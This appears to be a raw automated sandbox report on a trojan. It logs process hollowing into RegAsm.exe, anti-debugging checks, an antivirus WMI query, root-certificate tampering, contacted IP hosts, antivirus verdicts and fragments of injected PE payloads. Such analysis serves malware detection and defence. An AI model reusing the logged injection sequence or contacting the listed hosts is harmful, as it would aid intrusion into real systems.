buffer: MZÿÿ‹@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÔ÷à ˆÆ`uÀÓ@@ÿËÁû@°îLü6$Àî; ðÓ´.text¨†ÆˆÆ `.rdata\  Æ ŒÆ@@.dataLçÀÓèªÓ@À.idataL°î’ê@À.reloc; Àî< ˜ê@B.symtabüÔ÷B.rsrc6$ü&Ö÷@@‹$ÃÌÌÌÌÌÌÌÌÌÌÌ̋ $ÃÌÌÌÌÌÌÌÌÌÌÌ̋$ÃÌÌÌÌÌÌÌÌÌÌÌ̋$ÃÌÌÌÌÌÌÌÌÌÌÌ̋,$ÃÌÌÌÌÌÌÌÌÌÌÌ̋4$ÃÌÌÌÌÌÌÌÌÌÌÌ̋<$ÃÌÌÌÌÌÌÌÌÌÌÌÌÿ Go build ID: "pq5QRNjOsRk7j4oYV3qX/wEOWHkDsXyyGe7Ns5mSi/D-AbyzhzjmrKqtAyFskc/ujk_X_Tf-Vle7RDOyePy" ÿÌÌÌÌÌÌÌÌ̋ €æ,d‹ ‹ ;a†šƒìèıO]C‰$ÇD$èºè ²‹D$ „èž±虳èô±菱O‹C‰$ÇD$èÙ¹èÔ±èo±èj³èűè`±T]C‰$ÇD$誹襱è@±è;³薱ƒÄÃèÍCéHÿÿÿÌÌÌÌÌÌÌ̋ €æ,d‹ ‹ ;avAƒì‹T$ƒúv€¿‰$˜êz‰D$èŒè…ÒtäZÿ…Úu݋T$ „‹D$1ÉèðWèjCë¨ÌÌÌÌÌÌÌ̋ €æ,d‹ ‹ ;avƒì‹T$ „1À‰Áè¾Wè8CëÖÌÌÌÌÌ̃ì‹T$ „1À‰ÁèžWÌÌÌÌÌÌÌÌÌÌÌÌ̋ €æ,d‹ ‹ ;avPƒì¶T$ ¶Ò‹Üö'‹-Øö'9Ó…Ûv'‹E‹M‰D$‰L$ƒÄÍDՋ‹@‰L$‰D$ƒÄÃ1À‰Áè1Wè«Bë™ÌÌÌÌÌÌÌÌ̋ €æ,d‹ ‹ ;av‹D$¶@ƒàˆD$Ãè{BëÙÌÌÌÌÌÌÌÌ̋ €æ,d‹ ‹ ;av‹D$¶@ öÀ•ÀˆD$ÃèHBëÖÌÌÌÌÌ̋ €æ,d‹ ‹ ;av‹D$‹@…À•ÀˆD$ÃèBëØÌÌÌÌÌÌÌ̋ €æ,d‹ ‹ ;av‹D$¶@öÀ ”ÀˆD$ÃèèAëÖÌÌÌÌÌ̋ €æ,d‹ ‹ ;av‹D$¶@öÀ •ÀˆD$Ãè¸AëÖÌÌÌÌÌ̋ €æ,d‹ ‹ ;avXƒì‹L$…É|G‹T$ ‹R‰Ó÷Ú9Ñw*‹D$9Ár)Á‰Ê÷ÙÁù!È؉D$‰T$‰T$ ƒÄÃè
request_handle: 0x00cc0030
1 1 0

InternetReadFile

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ §ZpcôZpcôZpcô`õ]pcôfõîpcôgõPpcô™óžôYpcô™ó`õSpcô™ógõKpcô™ófõrpcôbõQpcôZpbôÁpcôOôgõCpcôOôaõ[pcôRichZpcôPEd†ÿqìfð" ( Ž°Í@°‡—¢`Á€„\Êxpá'@P" d€ @Ÿ@° .textŸ  `.rdataP*°,¤@@.dataøSàÐ@À.pdataP"@$Þ@@.rsrcá'p(@@.relocd *@BHƒì(èî‹H‹îωèîH‹H‹ÝÏH‰HH‹ ÒÏHƒÄ(é‰'ÌÌÌÌÌÌÌÌÌH‘#ÃÌÌÌÌÌÌÌÌH‰\$H‰t$ L‰D$WATAUAVAWHƒì0L‹ò3öHL¨D‹þI‹øH‹ÙA½ÿÿÿÿè45L‹àH…ÀuIVH )¨èlé!A‹VE3ÀH“I‹Ìèö…Ày#è@>MNL-¨H b¨‹è/éÆA‹N èU>L‹øH…Àu+A‹^ è>MN‰\$ LA¨H N¦‹èóéŠA€~uM‹ÏE3ÀI‹ÖI‹ÌèÖëaA‹^ H‰l$`I‹ïH…ÛtD¸ @ff„H;ØH‹ûM‹ÌA¸HGøH‹ÍH‹×èòHƒøriHï¸ H+ßuϋÆH‹|$pH‹l$`…Àt I‹Ïè‡=L‹þI‹Ìè˜îI‹÷M…ÿtH‹×I‹Ïè)5D‹èH‹Îè^=H‹\$hA‹ÅH‹t$xHƒÄ0A_A^A]A\_Ãè=MNLK¦H x¦‹èA‹ÅëƒH‰T$H‰L$SUVWAVAWHìˆ3ÀM‹ðH‹ÚH‰D$PH‹ùH‰D$XA¸XH‰D$`Hp¤‰D$(HL$ H‰D$ ‹èI‹ñè«D‹ø…Àt(HSD‹ÀH S¤èŽ¸ÿÿÿÿHÄˆA_A^_^][ù L‰¬$€è›<L‹èH…Àu#èR<LKL_¤H œ¤‹èAée¹ èf<H‹èH…Àu#è<LKLz¤H g¤‹è é0L‰¤$ÐA¿ÿÿÿÿD‹cD¸ I‹ÜL;àL‹ÏºI‹ÍHGØL‹ÃèZðH;Ã…æH‹Ïè½í…À…ÖL+ã‰\$(L‰l$ f„» H‰l$03҉\$8HL$ è6Ž‹øA¿ÿÿÿÿHƒùv|ƒøtr‹L$8H+ÙM…öt)M‹ÎL‹ÃºH‹Íè÷H;Ãu I‹ÎèEí…ÀtA‹ÿëBH…ötL‹ÃH‹ÕH‹ÎèIŠHóƒ|$8„{ÿÿÿƒÿtM…ätH
request_handle: 0x00cc0028
1 1 0
section {u'size_of_data': u'0x0040dc00', u'virtual_address': u'0x00002000', u'entropy': 7.8394337067468225, u'name': u'.text', u'virtual_size': u'0x0040db24'} entropy 7.83943370675 description A section with a high entropy has been found
section {u'size_of_data': u'0x0055ea00', u'virtual_address': u'0x00412000', u'entropy': 7.99188854742362, u'name': u'.rsrc', u'virtual_size': u'0x0055e916'} entropy 7.99188854742 description A section with a high entropy has been found
entropy 0.999689199689 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.winimage.com/zLibDll
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2512
process_handle: 0x00000250
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2512
process_handle: 0x00000250
1 0 0
host 103.130.147.211
host 45.91.200.135
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2512
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000244
3221225496 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000024c
1 0 0
wmi Select * From AntiVirusProduct
Process injection Process 800 manipulating memory of non-child process 2512
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2512
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000244
3221225496 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ù©} ½Èó½Èó½Èóö°ò¬Èóö°òvÈóö°ò¥ÈóIîó¹ÈóIòÜÈóIò¨ÈóIò¤Èóö°ò°Èó½Èó|ÈóNJòýÈóNJìó¼Èó½È„ó¼ÈóNJò¼ÈóRich½ÈóPEL@ñfà '¨2oõÀ@@€d£Œ0VTyP&8À&%@À .text짨 `.rdata0ïÀð¬@@.datahp°Jœ@À.rsrcV0Væ@@.relocTyz<@B
base_address: 0x00400000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2552
process_handle: 0x0000024c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ù©} ½Èó½Èó½Èóö°ò¬Èóö°òvÈóö°ò¥ÈóIîó¹ÈóIòÜÈóIò¨ÈóIò¤Èóö°ò°Èó½Èó|ÈóNJòýÈóNJìó¼Èó½È„ó¼ÈóNJò¼ÈóRich½ÈóPEL@ñfà '¨2oõÀ@@€d£Œ0VTyP&8À&%@À .text짨 `.rdata0ïÀð¬@@.datahp°Jœ@À.rsrcV0Væ@@.relocTyz<@B
base_address: 0x00400000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0
Bkav W32.AIDetectMalware.CS
CrowdStrike win/malicious_confidence_60% (D)
K7GW Trojan ( 005ba32d1 )
K7AntiVirus Trojan ( 005ba32d1 )
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Kryptik.AMGY
APEX Malicious
ClamAV Win.Packed.Malwarex-10033462-0
McAfeeD ti!45F875DDE426
Trapmine suspicious.low.ml.score
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.221942540e263063
Google Detected
Microsoft Trojan:Win32/Wacatac.B!ml
DeepInstinct MALICIOUS
Malwarebytes Trojan.Crypt.MSIL.Generic
Ikarus Trojan.MSIL.Injector
Fortinet MSIL/Kryptik.AMGY!tr
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 800 called NtSetContextThread to modify thread in remote process 2552
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5502319
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000250
process_identifier: 2552
1 0 0
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macCroatian.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso2022-jp.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-4.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp860.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-9.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-16.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\gb2312-raw.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp437.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-8.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp864.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\shiftjis.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\ksc5601.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\big5.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp869.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-14.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp1250.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\jis0201.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso2022-kr.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp1255.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\koi8-u.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp949.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-3.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macCentEuro.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp950.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-6.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-5.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macGreek.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp874.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\koi8-r.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macRomania.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp1254.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp737.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp850.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-11.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\gb12345.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macJapan.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macCyrillic.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\dingbats.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp1251.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp1257.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp932.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp775.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-10.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp855.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-15.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp1256.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso2022.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-13.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cns11643.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macIceland.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\numpy\_core\_multiarray_tests.cp312-win_amd64.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\macCroatian.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\setuptools\_vendor\platformdirs-4.2.2.dist-info\licenses\LICENSE
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\ru.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\fr_ch.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp852.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\sw.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\typeguard-4.3.0.dist-info\RECORD
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\jis0201.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\setuptools\_vendor\more_itertools-10.3.0.dist-info\METADATA
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Cayman
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp950.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Africa\Blantyre
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Whitehorse
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Nome
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\es_uy.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-11.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\setuptools\_vendor\importlib_resources-6.4.0.dist-info\LICENSE
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Asia\Dili
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\cp1257.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\PIL\_imaging.cp312-win_amd64.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\iso8859-15.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\mr.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\kl_gl.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\hi.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Asia\Irkutsk
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\zh_cn.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\setuptools\_vendor\importlib_resources-6.4.0.dist-info\REQUESTED
file C:\Users\test22\AppData\Local\Temp\_MEI27602\setuptools\_vendor\jaraco.functools-4.0.1.dist-info\INSTALLER
file C:\Users\test22\AppData\Local\Temp\_MEI27602\VCRUNTIME140_1.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\da.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\setuptools\_vendor\jaraco.collections-5.1.0.dist-info\top_level.txt
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\encoding\big5.enc
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Africa\Accra
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\pl.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Africa\Lagos
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Kralendijk
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Africa\Sao_Tome
file C:\Users\test22\AppData\Local\Temp\_MEI27602\setuptools\_vendor\more_itertools-10.3.0.dist-info\RECORD
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Indiana\Marengo
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Lower_Princes
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Asia\Anadyr
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Argentina\Jujuy
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Marigot
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\ms_my.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_socket.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\America\Montserrat
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\msgs\nn.msg
file C:\Users\test22\AppData\Local\Temp\_MEI27602\_tcl_data\tzdata\Africa\Juba
Process injection Process 800 resumed a thread in remote process 2552
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000250
suspend_count: 1
process_identifier: 2552
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 800
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 800
1 0 0

NtResumeThread

thread_handle: 0x00000198
suspend_count: 1
process_identifier: 800
1 0 0

NtResumeThread

thread_handle: 0x00000240
suspend_count: 1
process_identifier: 800
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 800
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtSetContextThread

registers.eip: 1945840516
registers.esp: 1764160
registers.edi: 77843
registers.eax: 1764160
registers.ebp: 1764620
registers.edx: 69102656
registers.ebx: 49695784
registers.esi: 0
registers.ecx: 19
thread_handle: 0x000000e0
process_identifier: 800
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 800
1 0 0

CreateProcessInternalW

thread_identifier: 2516
thread_handle: 0x00000248
process_identifier: 2512
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000244
1 1 0

NtGetContextThread

thread_handle: 0x00000248
1 0 0

NtAllocateVirtualMemory

process_identifier: 2512
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000244
3221225496 0

CreateProcessInternalW

thread_identifier: 2556
thread_handle: 0x00000250
process_identifier: 2552
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000024c
1 1 0

NtGetContextThread

thread_handle: 0x00000250
1 0 0

NtAllocateVirtualMemory

process_identifier: 2552
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000024c
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ù©} ½Èó½Èó½Èóö°ò¬Èóö°òvÈóö°ò¥ÈóIîó¹ÈóIòÜÈóIò¨ÈóIò¤Èóö°ò°Èó½Èó|ÈóNJòýÈóNJìó¼Èó½È„ó¼ÈóNJò¼ÈóRich½ÈóPEL@ñfà '¨2oõÀ@@€d£Œ0VTyP&8À&%@À .text짨 `.rdata0ïÀð¬@@.datahp°Jœ@À.rsrcV0Væ@@.relocTyz<@B
base_address: 0x00400000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0056c000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0058b000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00593000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x005d9000
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2552
process_handle: 0x0000024c
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5502319
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000250
process_identifier: 2552
1 0 0

NtResumeThread

thread_handle: 0x00000250
suspend_count: 1
process_identifier: 2552
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2552
1 0 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x00000438
process_identifier: 2760
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\Documents\iofolko5\VKiUj1bswl1U4GpzdLupgrRl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000544
1 1 0

CreateProcessInternalW

thread_identifier: 2800
thread_handle: 0x00000570
process_identifier: 2796
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\Documents\iofolko5\t5zjygAQWmij_0YBlvBaECOC.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000005f8
1 1 0

NtResumeThread

thread_handle: 0x0000000000000090
suspend_count: 1
process_identifier: 2760
1 0 0

CreateProcessInternalW

thread_identifier: 2980
thread_handle: 0x000000000000009c
process_identifier: 2976
current_directory:
filepath: C:\Users\test22\Documents\iofolko5\VKiUj1bswl1U4GpzdLupgrRl.exe
track: 1
command_line: C:\Users\test22\Documents\iofolko5\VKiUj1bswl1U4GpzdLupgrRl.exe
filepath_r: C:\Users\test22\Documents\iofolko5\VKiUj1bswl1U4GpzdLupgrRl.exe
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000000000000a0
1 1 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 1
process_identifier: 2976
1 0 0